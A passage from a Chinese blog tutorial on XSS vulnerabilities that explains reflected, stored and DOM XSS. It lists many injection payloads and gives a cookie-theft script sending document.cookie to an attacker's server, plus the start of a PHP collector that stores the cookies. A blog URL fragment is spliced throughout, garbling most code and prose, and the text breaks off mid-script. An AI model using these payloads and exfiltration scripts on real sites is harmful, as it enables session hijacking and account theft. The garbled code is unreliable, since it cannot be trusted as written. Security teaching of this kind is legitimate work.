85.網絡安全滲透測試—[常規漏洞挖掘與利用篇1]—[xss漏洞挖掘-測試與利用]

我認為,無論是學習安全還是從事安全的人,多多少少都有些許的情懷和使命感!!!

文章目錄

    • 一、xss漏洞測試與利用
      • https://blog.csdn.net/qq_45555226/article/details/1、相關概念
      • 2、xss漏洞類型
      • 3、xss漏洞測試
      • 4、xss漏洞利用原理:`盜取COOKIE`
      • 5、xss漏洞利用示例:`盜取COOKIE`
      • 6、xss漏洞利用原理:`基礎認證釣魚`
      • 7、xss漏洞利用示例:`基礎認證釣魚`
      • 8、xss漏洞利用原理:`鍵盤記錄器`
      • 9、xss漏洞利用示例:`鍵盤記錄器`
      • https://blog.csdn.net/qq_45555226/article/details/10、關閉瀏覽器XSS防護機制
      • https://blog.csdn.net/qq_45555226/article/details/1https://blog.csdn.net/qq_45555226/article/details/1、思考

一、xss漏洞測試與利用 https://blog.csdn.net/qq_45555226/article/details/1、相關概念

(https://blog.csdn.net/qq_45555226/article/details/1)xss漏洞概念: XSS攻擊全稱跨站腳本攻擊,是為瞭不和層疊樣式表(Cascading Style Sheets, CSS)的縮寫混淆,故將跨站腳本攻擊縮寫為XSS,XSS是一種在web應用中的計算機安全漏洞,它允許惡意web用戶將代碼植入到web網站裡面,供給其它用戶訪問,當用戶訪問到有惡意代碼的網頁就會產生xss攻擊。

(2)xss漏洞實質: XSS漏洞利用,就是註入一對script標簽,其一是直接內含惡意js語句;其二是標簽裡面引入一個惡意js腳本文件,該js文件中含有著我們編寫的js腳本,這個腳本的功能有很多種類,比如基本認證釣魚、獲得用戶cookie、內網IP等等!!!

(3)xss漏洞危害:

盜取各類用戶帳號,如機器登錄帳號、用戶網銀帳號、各類管理員帳號控制企業數據,包括讀取、篡改、添加、刪除企業敏感數據的能力盜竊企業重要的具有商業價值的資料非法轉賬強制發送電子郵件網站掛馬控制受害者機器向其它網站發起攻擊

2、xss漏洞類型

(https://blog.csdn.net/qq_45555226/article/details/1)反射型: 反射型XSS,非持久化,需要欺騙用戶自己去點擊鏈接才能觸發XSS代碼。

(2)存儲型: 存儲型XSS,持久化,代碼是存儲在服務器中的,如在個人信息或發表文章或發表評論等地方,加入代碼,如果沒有過濾或過濾不嚴,那麼這些代碼將儲存到服務器中,用戶訪問該頁面的時候觸發代碼執行。

(3)DOM型: DOM,全稱Document Object Model,是一個平臺和語言都中立的接口,可以使程序和腳本能夠動態訪問和更新文檔的內容、結構以及樣式。
         DOM型XSS其實是一種特殊類型的反射型XSS,它是基於DOM文檔對象模型的一種漏洞。
         在網站頁面中有許多頁面的元素,當頁面到達瀏覽器時瀏覽器會為頁面創建一個頂級的Document object文檔對象,接著生成各個子文檔對象,每個頁面元素對應一個文檔對象,每個文檔對象包含屬性、方法和事件。可以通過JS腳本對文檔對象進行編輯從而修改頁面的元素。也就是說,客戶端的腳本程序可以通過DOM來動態修改頁面內容,從客戶端獲取DOM中的數據並在本地執行。基於這個特性,就可以利用JS腳本來實現XSS漏洞的利用。
         火狐瀏覽器默認是不能執行這種dom型xss,因為火狐會把url上面的字符串進行編碼,在ie裡面默認不編碼,但是要關閉xss過濾器方可執行。

document.https://blog.csdn.net/qq_45555226/article/details/referer屬性window.https://blog.csdn.net/qq_45555226/article/details/name屬性location屬性innerHTML屬性documen.https://blog.csdn.net/qq_45555226/article/details/write屬性

3、xss漏洞測試

(https://blog.csdn.net/qq_45555226/article/details/1)測試的目的是: 為瞭驗證當前頁面是否會執行我們註入的html標簽或js語句,從而可以讓我們註入惡意js語句或引入惡意js腳本文件。

(2)常規測試語句:

反射型&https://blog.csdn.net/qq_45555226/article/details/存儲型&https://blog.csdn.net/qq_45555226/article/details/dom:註意火狐會對dom型進行url編碼,所以要使用ie<https://blog.csdn.net/qq_45555226/article/details/h5>https://blog.csdn.net/qq_45555226/article/details/https://blog.csdn.net/qq_45555226/article/details/1https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/h5>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details/script>https://blog.csdn.net/qq_45555226/article/details/alerthttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/xss/https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/script>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details/SCRIPT>https://blog.csdn.net/qq_45555226/article/details/alerthttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/document.https://blog.csdn.net/qq_45555226/article/details/cookie)https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/SCRIPT>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details/img src=https://blog.csdn.net/qq_45555226/article/details/https://blog.csdn.net/qq_45555226/article/details/1https://blog.csdn.net/qq_45555226/article/details/ onerror=https://blog.csdn.net/qq_45555226/article/details/alerthttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/document.https://blog.csdn.net/qq_45555226/article/details/cookie)https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/存儲型&https://blog.csdn.net/qq_45555226/article/details/dom:註意火狐會對dom型進行url編碼,所以要使用ie<https://blog.csdn.net/qq_45555226/article/details/script>https://blog.csdn.net/qq_45555226/article/details/varhttps://blog.csdn.net/qq_45555226/article/details/ img=https://blog.csdn.net/qq_45555226/article/details/document.https://blog.csdn.net/qq_45555226/article/details/createElementhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/"img"https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/img.https://blog.csdn.net/qq_45555226/article/details/src=https://blog.csdn.net/qq_45555226/article/details/"//https://blog.csdn.net/qq_45555226/article/details/192.https://blog.csdn.net/qq_45555226/article/details/168.97.https://blog.csdn.net/qq_45555226/article/details/130/exp/xss/a?"https://blog.csdn.net/qq_45555226/article/details/+https://blog.csdn.net/qq_45555226/article/details/escapehttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/document.https://blog.csdn.net/qq_45555226/article/details/cookie)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/script>https://blog.csdn.net/qq_45555226/article/details/

(3)反射型測試:

http://www.webtester.com/xss/xss0https://blog.csdn.net/qq_45555226/article/details/1.php?name=https://blog.csdn.net/qq_45555226/article/details/1

http://www.webtester.com/xss/xss0https://blog.csdn.net/qq_45555226/article/details/1.php?name=

http://www.webtester.com/xss/xss0https://blog.csdn.net/qq_45555226/article/details/1.php?name=

(4)存儲型測試:

http://www.webtester.com/xss/xss02.php?name=

http://www.webtester.com/xss/xss02.php?name=

(5)DOM型測試:

http://www.webtester.com/xss/xss03.php?name=https://blog.csdn.net/qq_45555226/article/details/1

http://www.webtester.com/xss/xss03.php?name=

http://www.webtester.com/xss/xss03.php?name=

http://www.webtester.com/xss/xss03.php?name=

(3)其他測試語句:

<https://blog.csdn.net/qq_45555226/article/details/script>https://blog.csdn.net/qq_45555226/article/details/alerthttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/'hello,gaga!'https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/script>https://blog.csdn.net/qq_45555226/article/details/ //經典語句,哈哈!https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/"'><img src="https://blog.csdn.net/qq_45555226/article/details/javascript.https://blog.csdn.net/qq_45555226/article/details/:https://blog.csdn.net/qq_45555226/article/details/alerthttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/'XSS'https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/">>"https://blog.csdn.net/qq_45555226/article/details/'><table background='https://blog.csdn.net/qq_45555226/article/details/javascript.https://blog.csdn.net/qq_45555226/article/details/:https://blog.csdn.net/qq_45555226/article/details/alerthttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/[https://blog.csdn.net/qq_45555226/article/details/code]https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/'><object type=text/html data='https://blog.csdn.net/qq_45555226/article/details/javascript.https://blog.csdn.net/qq_45555226/article/details/:https://blog.csdn.net/qq_45555226/article/details/alerthttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/[https://blog.csdn.net/qq_45555226/article/details/code]https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/'>"+alert('https://blog.csdn.net/qq_45555226/article/details/XSS')+"'https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details/script>https://blog.csdn.net/qq_45555226/article/details/alerthttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/document.https://blog.csdn.net/qq_45555226/article/details/cookie)https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/script>https://blog.csdn.net/qq_45555226/article/details/=https://blog.csdn.net/qq_45555226/article/details/'>alert('https://blog.csdn.net/qq_45555226/article/details/XSS')<img src="javascript:alert('https://blog.csdn.net/qq_45555226/article/details/XSS')">%0a%0a.jsp%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html a.jsp/"><IMG SRC="javascript.:alert('https://blog.csdn.net/qq_45555226/article/details/XSS');"><IMG src="https://blog.csdn.net/javascript.:alert"('https://blog.csdn.net/qq_45555226/article/details/XSS')><IMG src="https://blog.csdn.net/JaVaScRiPt.:alert"('https://blog.csdn.net/qq_45555226/article/details/XSS')><IMG SRC="jav	ascript.:alert('https://blog.csdn.net/qq_45555226/article/details/XSS');"><IMG SRC="jav
ascript.:alert('https://blog.csdn.net/qq_45555226/article/details/XSS');"><IMG SRC="jav
ascript.:alert('https://blog.csdn.net/qq_45555226/article/details/XSS');">"";'https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/out<https://blog.csdn.net/qq_45555226/article/details/IMG SRC=https://blog.csdn.net/qq_45555226/article/details/" javascript.:alert('XSS');"https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details/SCRIPT>https://blog.csdn.net/qq_45555226/article/details/a=https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/XSS/https://blog.csdn.net/qq_45555226/article/details/alerthttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/a.https://blog.csdn.net/qq_45555226/article/details/source)https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/SCRIPT>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details/BODY BACKGROUND=https://blog.csdn.net/qq_45555226/article/details/"javascript.:alert('XSS')"https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details/BODY ONLOAD=https://blog.csdn.net/qq_45555226/article/details/alerthttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/'XSS'https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details/IMG DYNSRC=https://blog.csdn.net/qq_45555226/article/details/"javascript.:alert('XSS')"https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details/IMG LOWSRC=https://blog.csdn.net/qq_45555226/article/details/"javascript.:alert('XSS')"https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details/BGSOUND SRC=https://blog.csdn.net/qq_45555226/article/details/"javascript.:alert('XSS');"https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details/br size=https://blog.csdn.net/qq_45555226/article/details/"&{alert('XSS')}"https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details/LAYER SRC=https://blog.csdn.net/qq_45555226/article/details/"http://xss.ha.ckers.org/a.js"https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/layer>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details/LINK REL=https://blog.csdn.net/qq_45555226/article/details/"stylesheet"https://blog.csdn.net/qq_45555226/article/details/HREF=https://blog.csdn.net/qq_45555226/article/details/"javascript.:alert('XSS');"https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details/IMG SRC=https://blog.csdn.net/qq_45555226/article/details/'vbscript.:msgbox("XSS")'https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details/META.https://blog.csdn.net/qq_45555226/article/details/ HTTP-https://blog.csdn.net/qq_45555226/article/details/EQUIV=https://blog.csdn.net/qq_45555226/article/details/"refresh"https://blog.csdn.net/qq_45555226/article/details/CONTENT=https://blog.csdn.net/qq_45555226/article/details/"0;url=javascript.:alert('XSS');"https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details/IFRAME.https://blog.csdn.net/qq_45555226/article/details/ src=https://blog.csdn.net/qq_45555226/article/details/"https://blog.csdn.net/javascript.:alert"https://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/'XSS'https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/IFRAME>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details/FRAMESET>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details/FRAME.https://blog.csdn.net/qq_45555226/article/details/ src=https://blog.csdn.net/qq_45555226/article/details/"https://blog.csdn.net/javascript.:alert"https://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/'XSS'https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/FRAME>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/FRAMESET>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details/TABLE BACKGROUND=https://blog.csdn.net/qq_45555226/article/details/"javascript.:alert('XSS')"https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details/DIV STYLE=https://blog.csdn.net/qq_45555226/article/details/"background-image: url(javascript.:alert('XSS'))"https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details/DIV STYLE=https://blog.csdn.net/qq_45555226/article/details/"behaviour: url('http://www.how-to-hack.org/exploit.html');"https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details/DIV STYLE=https://blog.csdn.net/qq_45555226/article/details/"width: expression(alert('XSS'));"https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details/STYLE>https://blog.csdn.net/qq_45555226/article/details/@im\port'\ja\vasc\ript:alert("XSS")'https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/STYLE>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details/IMG STYLE=https://blog.csdn.net/qq_45555226/article/details/'xss:expre\ssion(alert("XSS"))'https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details/STYLE.https://blog.csdn.net/qq_45555226/article/details/ TYPE=https://blog.csdn.net/qq_45555226/article/details/"texthttps://blog.csdn.net/javascript"https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/alerthttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/'XSS'https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/STYLE>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details/STYLE.https://blog.csdn.net/qq_45555226/article/details/ TYPE=https://blog.csdn.net/qq_45555226/article/details/"text/css"https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/.https://blog.csdn.net/qq_45555226/article/details/XSS{https://blog.csdn.net/qq_45555226/article/details/background-https://blog.csdn.net/qq_45555226/article/details/image:https://blog.csdn.net/qq_45555226/article/details/urlhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/"javascript.:alert('XSS')"https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/}https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/STYLE>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details/A CLASS=https://blog.csdn.net/qq_45555226/article/details/XSS>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/A>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details/STYLE.https://blog.csdn.net/qq_45555226/article/details/ typehttps://blog.csdn.net/qq_45555226/article/details/=https://blog.csdn.net/qq_45555226/article/details/"text/css"https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/BODY{https://blog.csdn.net/qq_45555226/article/details/background:https://blog.csdn.net/qq_45555226/article/details/urlhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/"javascript.:alert('XSS')"https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/}https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/STYLE>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details/BASE HREF=https://blog.csdn.net/qq_45555226/article/details/"javascript.:alert('XSS');//"https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/getURLhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/"javascript.:alert('XSS')"https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/a=https://blog.csdn.net/qq_45555226/article/details/"get"https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/b=https://blog.csdn.net/qq_45555226/article/details/"URL"https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/c=https://blog.csdn.net/qq_45555226/article/details/"javascript.:"https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/d=https://blog.csdn.net/qq_45555226/article/details/"alert('XSS');"https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/evalhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/a+https://blog.csdn.net/qq_45555226/article/details/b+https://blog.csdn.net/qq_45555226/article/details/c+https://blog.csdn.net/qq_45555226/article/details/d)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details/XML SRC=https://blog.csdn.net/qq_45555226/article/details/"javascript.:alert('XSS');"https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/"> <BODY NLOAD="https://blog.csdn.net/qq_45555226/article/details/ahttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/"><"https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details/SCRIPT.https://blog.csdn.net/qq_45555226/article/details/ SRC=https://blog.csdn.net/qq_45555226/article/details/"http://xss.ha.ckers.org/xss.jpg"https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/SCRIPT>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details/IMG SRC=https://blog.csdn.net/qq_45555226/article/details/"javascript.:alert('XSS')"https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details/SCRIPT.https://blog.csdn.net/qq_45555226/article/details/ a=https://blog.csdn.net/qq_45555226/article/details/">"https://blog.csdn.net/qq_45555226/article/details/SRC=https://blog.csdn.net/qq_45555226/article/details/"http://xss.ha.ckers.org/a.js"https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/SCRIPT>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details/SCRIPT.https://blog.csdn.net/qq_45555226/article/details/=https://blog.csdn.net/qq_45555226/article/details/">"https://blog.csdn.net/qq_45555226/article/details/SRC=https://blog.csdn.net/qq_45555226/article/details/"http://xss.ha.ckers.org/a.js"https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/SCRIPT>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details/SCRIPT.https://blog.csdn.net/qq_45555226/article/details/ a=https://blog.csdn.net/qq_45555226/article/details/">"https://blog.csdn.net/qq_45555226/article/details/''https://blog.csdn.net/qq_45555226/article/details/SRC=https://blog.csdn.net/qq_45555226/article/details/"http://xss.ha.ckers.org/a.js"https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/SCRIPT>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details/SCRIPT.https://blog.csdn.net/qq_45555226/article/details/"a='>'"https://blog.csdn.net/qq_45555226/article/details/SRC=https://blog.csdn.net/qq_45555226/article/details/"http://xss.ha.ckers.org/a.js"https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/SCRIPT>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details/SCRIPT>https://blog.csdn.net/qq_45555226/article/details/document.https://blog.csdn.net/qq_45555226/article/details/writehttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/"<SCRI"https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/SCRIPT>https://blog.csdn.net/qq_45555226/article/details/PTSRC=https://blog.csdn.net/qq_45555226/article/details/"http://xss.ha.ckers.org/a.js"https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/SCRIPT>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details/A HREF=https://blog.csdn.net/qq_45555226/article/details/http:https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/www.https://blog.csdn.net/qq_45555226/article/details/gohttp:https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/www.https://blog.csdn.net/qq_45555226/article/details/google.https://blog.csdn.net/qq_45555226/article/details/com/https://blog.csdn.net/qq_45555226/article/details/ogle.https://blog.csdn.net/qq_45555226/article/details/com/https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/link<https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/A>https://blog.csdn.net/qq_45555226/article/details/

4、xss漏洞利用原理:盜取COOKIE

(https://blog.csdn.net/qq_45555226/article/details/1)攻擊者的惡意js腳本文件:xss_attack.js

         背景:當攻擊者在評論處或留言板處測試出存在xss存儲型漏洞,那麼就可以通過一條script語句來外鏈攻擊者的遠程服務器上的這個xss_attack.js惡意腳本文件,從而執行下面的語句。
         功能:該腳本可以創建一個img標簽,並通過src來引入攻擊者遠程服務器上的xss_receive.php腳本,同時以GET形式傳遞此時在留言板或評論處獲得的cookie值給qwsn參數

varhttps://blog.csdn.net/qq_45555226/article/details/ img =https://blog.csdn.net/qq_45555226/article/details/ document.https://blog.csdn.net/qq_45555226/article/details/createElementhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/'img'https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/img.https://blog.csdn.net/qq_45555226/article/details/width =https://blog.csdn.net/qq_45555226/article/details/ 0https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/img.https://blog.csdn.net/qq_45555226/article/details/height =https://blog.csdn.net/qq_45555226/article/details/ 0https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/img.https://blog.csdn.net/qq_45555226/article/details/src =https://blog.csdn.net/qq_45555226/article/details/ 'http://攻擊者遠程WEB服務器/xss_receive.php?qwsn='https://blog.csdn.net/qq_45555226/article/details/+https://blog.csdn.net/qq_45555226/article/details/encodeURIComponenthttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/document.https://blog.csdn.net/qq_45555226/article/details/cookie)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details///通過qwsn參數傳入cookie到攻擊者的接收頁面https://blog.csdn.net/qq_45555226/article/details/

(2)攻擊者接收cookie的php文件:xss_receive.php

         功能:攻擊者把從評論處或留言板處接收過來的qwsn參數值,保存到攻擊者遠程服務器上的qwsn.php頁面中,從而得到其他人在訪問留言板或評論時候的相應cookie值

<?phphttps://blog.csdn.net/qq_45555226/article/details/    @ini_sethttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/'display_errors'https://blog.csdn.net/qq_45555226/article/details/,https://blog.csdn.net/qq_45555226/article/details/https://blog.csdn.net/qq_45555226/article/details/1https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/    $strhttps://blog.csdn.net/qq_45555226/article/details/ =https://blog.csdn.net/qq_45555226/article/details/ $_GEThttps://blog.csdn.net/qq_45555226/article/details/[https://blog.csdn.net/qq_45555226/article/details/'qwsn'https://blog.csdn.net/qq_45555226/article/details/]https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/ //讀取cookiehttps://blog.csdn.net/qq_45555226/article/details/    $filePathhttps://blog.csdn.net/qq_45555226/article/details/ =https://blog.csdn.net/qq_45555226/article/details/ 